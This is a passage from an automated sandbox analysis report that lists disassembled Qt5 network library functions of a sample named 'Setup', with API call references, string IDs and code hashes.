                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1A41ACE
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?mid@QStringRef@@QEBA?AV1@HH@Z.QT5CORE ref: 00007FFBA1A41AE5
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?toString@QStringRef@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFBA1A41AF3
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A41B03
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A41B0E
                                                                                                                                                                • Part of subcall function 00007FFBA19EFFD0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A451C0), ref: 00007FFBA19EFFE3
                                                                                                                                                              • ?toLower@QString@@QEHAA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A451CA
                                                                                                                                                              • ?startsWith@QString@@QEBA_NVQLatin1String@@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A451F1
                                                                                                                                                              • ?toLower@QString@@QEHAA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A45216
                                                                                                                                                              • ?startsWith@QString@@QEBA_NVQLatin1String@@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A45244
                                                                                                                                                              • ?toLower@QString@@QEHAA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A45265
                                                                                                                                                              • ?startsWith@QString@@QEBA_NVQLatin1String@@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A4528C
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452AA
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452BC
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452CE
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452E0
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452EA
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452F7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Latin1Logger@@MessageString$CaseQt@@@Ref@@Sensitivity@$?data@?startsArrayData@@V0@@With@$?warning@Category@@Enabled@H00@LoggingLower@String@Warning$Char@@DateFlags@Time@@V0@$$$?from?mid@?splitArray@@BehaviorByteChar@@@Latin1@Qt@@@@Ref@Ref@@@@SplitString@@@Vector@
                                                                                                                                                              • String ID: adh$aecdh$exp-adh
                                                                                                                                                              • API String ID: 205462867-4279389355
                                                                                                                                                              • Opcode ID: 0d449bfa7ac4ba704610cb40b1cb92989654e83b5a495114e1012cee4932cb71
                                                                                                                                                              • Instruction ID: 24963ad113d2a48ac5de4be14ee22839db90b2cbcc24d04a5dbeff21d9f60fab
                                                                                                                                                              • Opcode Fuzzy Hash: 0d449bfa7ac4ba704610cb40b1cb92989654e83b5a495114e1012cee4932cb71
                                                                                                                                                              • Instruction Fuzzy Hash: 0C615FB2B0AA0199EB92DF34D4903F823A0EF54798F804537DE6D56695EF3CE549CB10
                                                                                                                                                              Function 00007FFBA19D3030 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 140windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@Variant@@$Meta$Connection@Device@@Logger@@MessageOpen@$?class?connect@?critical@?free_helper@ConnectionData@@HashInt@Name@Node@1@@Qt@@@Type@V0@@Valid@
                                                                                                                                                              • String ID: 1_q_cacheSaveDeviceAboutToClose()$2aboutToClose()$QNetworkReplyImpl: network cache returned a device that is not open -- class %s probably needs to be fixed
                                                                                                                                                              • API String ID: 1164045123-1327536183
                                                                                                                                                              • Opcode ID: 8077fabf7a170bfb6fd7eb5a0d5239c1237566b180f3fe9e87ba4efccc531fd3
                                                                                                                                                              • Instruction ID: 7fc01ca870c6316a1c94b383da03ea85b73123565f0c66abc9dc6976384c674e
                                                                                                                                                              • Opcode Fuzzy Hash: 8077fabf7a170bfb6fd7eb5a0d5239c1237566b180f3fe9e87ba4efccc531fd3
                                                                                                                                                              • Instruction Fuzzy Hash: 366160B6B0AB4295EB86DF75D4943EC2364FB44B98F804132DE1D47A65EF38E50ACB00
                                                                                                                                                              Function 00007FFBA197B850 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127timewindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFBA197B85B
                                                                                                                                                                • Part of subcall function 00007FFBA197CAF0: ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE(?,?,?,00007FFBA197B899), ref: 00007FFBA197CB21
                                                                                                                                                              • ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE ref: 00007FFBA197B8BA
                                                                                                                                                              • ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA197B8E2
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA197B902
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197B91D
                                                                                                                                                              • ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA197B941
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA197B973
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA197B988
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA197B9A1
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA197B9AD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA197B9C0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA197B9E0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA197B9ED
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?stop@QBasicTimer@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBE1
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBF8
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?secsTo@QDateTime@@QEBA_JAEBV1@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC05
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC13
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?start@QBasicTimer@@QEAAXHPEAVQObject@@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC34
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Array@@ByteTime@@$BasicData@@HashHash@@Logger@@MessageString@@Timer@@V0@@$?allocate?current?data@?secs?start@?stop@?warning@?willChar@@Grow@Node@Object@@@TimeUtc@V1@@Xlength_error@std@@
                                                                                                                                                              • String ID: QNetworkAccessCache::addEntry: overriding active cache entry '%s'$vector<T> too long
                                                                                                                                                              • API String ID: 333450102-4070149868
                                                                                                                                                              • Opcode ID: 0336870cf550522d8e0ffb5512ffc08b51aa284285c75096a7515cf50bd01b24
                                                                                                                                                              • Instruction ID: 0e55006d55622b2d3f5105ecdbe26242c0b8eb5dd159c95ec92778664646f29c
                                                                                                                                                              • Opcode Fuzzy Hash: 0336870cf550522d8e0ffb5512ffc08b51aa284285c75096a7515cf50bd01b24
                                                                                                                                                              • Instruction Fuzzy Hash: C9414E62A09A4682EB51DB32E954279B361FF84BD8F904032DE5E47B65EF3CD446CF40
                                                                                                                                                              Function 00007FFBA197DD70 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 89COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$?append@$ConverterFunction@Type@@$?registerInit_thread_footer$?class?has?reserve@AbstractCriticalEnterFlag@Flags@Name@NormalizedObject@@Object@@@Private@@RegisteredSectionString@@TypeType@Type@@@@
                                                                                                                                                              • String ID: '$QSharedPointer
                                                                                                                                                              • API String ID: 1461905982-1706557631
                                                                                                                                                              • Opcode ID: 3a0d17ba2d00db0783a27892df23b79bf5ec152156c9aa846814ac20101c7cd5
                                                                                                                                                              • Instruction ID: b0cd19812d0ef8ed58c2990d9eab3d67628dd4e80a0171a1435f320bb8ca9b84
                                                                                                                                                              • Opcode Fuzzy Hash: 3a0d17ba2d00db0783a27892df23b79bf5ec152156c9aa846814ac20101c7cd5
                                                                                                                                                              • Instruction Fuzzy Hash: B4410DB1A0EA42D5EB82DB34E8542B423A1EF54764F904236CD2D466A1FF7CE54ACF10
                                                                                                                                                              Function 00007FFBA1972A50 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 83COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972A6D
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B05
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B0E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B1B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B2D
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BEC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$?scheme@Empty@Mutex@@
                                                                                                                                                              • String ID: auth:
                                                                                                                                                              • API String ID: 170769082-104923615
                                                                                                                                                              • Opcode ID: 343150191ed5f3a52c9d6835686ab0b8ac2d1c6ea2f00dc1c6bffe48108a2430
                                                                                                                                                              • Instruction ID: 3d019f26724b8584a71b0560226e73b194c1a54bb5420485ded7d65cab7e312a
                                                                                                                                                              • Opcode Fuzzy Hash: 343150191ed5f3a52c9d6835686ab0b8ac2d1c6ea2f00dc1c6bffe48108a2430
                                                                                                                                                              • Instruction Fuzzy Hash: D5314165B1AA2299EB82DB35D8440FC2361BF45B98B804032ED1F06A59EF3CD14ACB50
                                                                                                                                                              Function 00007FFBA19A1060 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 69COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Dir@@$Settings@@StandardString@@@$?absolute?set?shared?writableArrayArray@@ByteData@@Empty@Enabled@FallbacksFileFormat@0@Latin1Location@Location@1@@Null@Object@@@Path@Paths@@V0@@V2@@
                                                                                                                                                              • String ID: hstsstore
                                                                                                                                                              • API String ID: 2825709825-2408154460
                                                                                                                                                              • Opcode ID: c44d5f22ba8a07bb5d993f09e35ca07127d39106e78f7e273354b2d836c551b8
                                                                                                                                                              • Instruction ID: 1270ba1196cefaaa2c0654b5eb8ec4b27950fd065ed58e8d82f5056f6cd62e99
                                                                                                                                                              • Opcode Fuzzy Hash: c44d5f22ba8a07bb5d993f09e35ca07127d39106e78f7e273354b2d836c551b8
                                                                                                                                                              • Instruction Fuzzy Hash: 03315072A1DA4292EB51CF25E4845AAB3A1FF94764F444032DE9E46678EF3CD58ECF00
                                                                                                                                                              Function 00007FFBA1989840 Relevance: 25.7, APIs: 17, Instructions: 166timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isOpen@QIODevice@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989870
                                                                                                                                                              • ?reserve@QRingBuffer@@QEAAPEAD_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA19898E1
                                                                                                                                                              • ?read@QIODevice@@QEAA_JPEAD_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA19898F0
                                                                                                                                                              • ?chop@QRingBuffer@@QEAAX_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989909
                                                                                                                                                              • ?chop@QRingBuffer@@QEAAX_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA198996D
                                                                                                                                                              • ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A12
                                                                                                                                                              • ??0QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A1F
                                                                                                                                                              • ?toLongLong@QVariant@@QEBA_JPEA_N@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A36
                                                                                                                                                              • ??0QVariant@@QEAA@_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A4B
                                                                                                                                                              • ??4QVariant@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A5B
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A66
                                                                                                                                                              • ?readyRead@QIODevice@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A76
                                                                                                                                                              • ?elapsed@QElapsedTimer@@QEBA_JXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A83
                                                                                                                                                              • ?restart@QElapsedTimer@@QEAA_JXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A9C
                                                                                                                                                              • ?isNull@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989AA7
                                                                                                                                                              • ?toLongLong@QVariant@@QEBA_JPEA_N@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989AC1
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989AE6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Buffer@@Device@@Ring$?chop@ElapsedLongLong@Timer@@V0@@$?elapsed@?read@?ready?reserve@?restart@Null@Open@Read@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1573155983-0
                                                                                                                                                              • Opcode ID: 45c283c16b818476f01e14dcf60a65c97260e83598a9bf03065d406db6bea718
                                                                                                                                                              • Instruction ID: 762f4f33e90992b9999ccddc56231abd9ab342af1e86e7531e1c385754798535
                                                                                                                                                              • Opcode Fuzzy Hash: 45c283c16b818476f01e14dcf60a65c97260e83598a9bf03065d406db6bea718
                                                                                                                                                              • Instruction Fuzzy Hash: 577132B260AA4281EF919F36D4542B96362FB89FE8F084132DE5E477A5DF3DD446CB00
                                                                                                                                                              Function 00007FFBA19E4650 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 84timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E465F
                                                                                                                                                              • ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E4685
                                                                                                                                                              • ?qEnvironmentVariableIntValue@@YAHPEBDPEA_N@Z.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E46A5
                                                                                                                                                              • ?setInterval@QTimer@@QEAAXH@Z.QT5CORE ref: 00007FFBA19E46BE
                                                                                                                                                              • ?setSingleShot@QTimer@@QEAAX_N@Z.QT5CORE ref: 00007FFBA19E46CA
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19E46F7
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19E4702
                                                                                                                                                              • ?isActive@QTimer@@QEBA_NXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E470C
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E471F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E472C
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ?start@QTimer@@QEAAXXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E4771
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Timer@@$Object@@$?setConnection@Data@@ListMeta$?begin@?connect@?end@?lock@?start@Active@ConnectionEnvironmentInterval@Mutex@@Object@@@Qt@@@Shot@SingleType@Value@@Variablemalloc
                                                                                                                                                              • String ID: 1pollEngines()$2timeout()$QT_BEARER_POLL_TIMEOUT
                                                                                                                                                              • API String ID: 3802747260-2682786888
                                                                                                                                                              • Opcode ID: 5d06fb88f5b37ae5140e63146ea9c1f2b2164cdc097589948076b3d8f2241058
                                                                                                                                                              • Instruction ID: 0e2a5aa4b62c030cedc29454d8ddb8daa2486645c9318af3ded0a604f1f04f1b
                                                                                                                                                              • Opcode Fuzzy Hash: 5d06fb88f5b37ae5140e63146ea9c1f2b2164cdc097589948076b3d8f2241058
                                                                                                                                                              • Instruction Fuzzy Hash: 53316DA5A0AB4289EF82DF31E8441B87761FB85BA8F444432DD5E477A4EF3CD449CB40
                                                                                                                                                              Function 00007FFBA19EE320 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 70COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Char@@$?data@?size@AddressString@Utils@@$?append@Char@@@Empty@Initialization@Latin1Qt@@@V1@@memmove
                                                                                                                                                              • String ID: %
